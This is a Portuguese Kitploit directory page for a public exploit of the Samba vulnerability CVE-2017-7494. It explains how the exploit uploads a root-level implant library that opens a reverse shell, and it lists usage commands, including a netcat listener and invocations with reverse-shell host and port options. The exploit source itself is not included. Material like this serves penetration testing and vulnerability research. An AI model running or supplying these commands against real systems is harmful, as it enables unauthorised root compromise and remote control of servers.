Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-7494 — Exploit remoto de root para a vulnerabilidade SAMBA CVE-2017-7494 | Kitploit
Ferramentas/GitHubGitHub/joxeankoret/cve-2017-7494
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoFerramenta de Acesso RemotoArchived
GitHubjoxeankoret/cve-2017-7494

CVE-2017-7494

Exploit remoto de root para a vulnerabilidade SAMBA CVE-2017-7494

Ver Repositório
25974há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-7494

Exploração remota de root para a vulnerabilidade SAMBA CVE-2017-7494.

Detalhes

Este exploit é dividido em 2 partes:

  • Primeiro, compila um payload chamado "implant.c" e gera uma biblioteca (libimplantx32.so ou libimplantx64.so) que muda para o usuário root, se desanexa do processo pai e abre um shell reverso.
  • Segundo, encontra um compartilhamento gravável no host alvo especificado, envia a biblioteca com um nome aleatório e tenta carregá-la.

Contanto que o alvo seja vulnerável e o payload seja o correto para o sistema operacional e arquitetura do alvo, o exploit é 100% confiável.

Como usar

Na sua máquina, execute o seguinte comando:

root@kitploit:~
$ nc -p 31337 -l

Então, execute o exploit contra seu alvo e aguarde até que ele se conecte de volta ao seu Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Se você fechar o shell reverso muito rápido, em vez de executar novamente o exploit carregando o módulo, etc... você pode simplesmente passar o caminho para o módulo que já foi enviado. Supondo que foi enviado para /shared/directory/ como "module.so", você executaria um comando como o seguinte:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

ATUALIZAÇÃO 11/25/2017 - Archivaldo

Agora você pode executar o exploit contra samba 3.5.0 e 3.6.0, basta adicionar o argumento -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Agora você pode usar seu próprio .so personalizado

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Caso você precise executar este script de uma máquina x86, compilar os binários do implant criará dois arquivos x86. Usando a flag -n 1 você pode desabilitar a compilação e copiar libimplantx64.so de outra máquina.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Caso o samba execute apenas na porta 139. Você pode definir a porta do servidor remoto usando o argumento -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTAS

Não ofereço mais suporte para isso.

-- Joxean Koret

Baixar ferramenta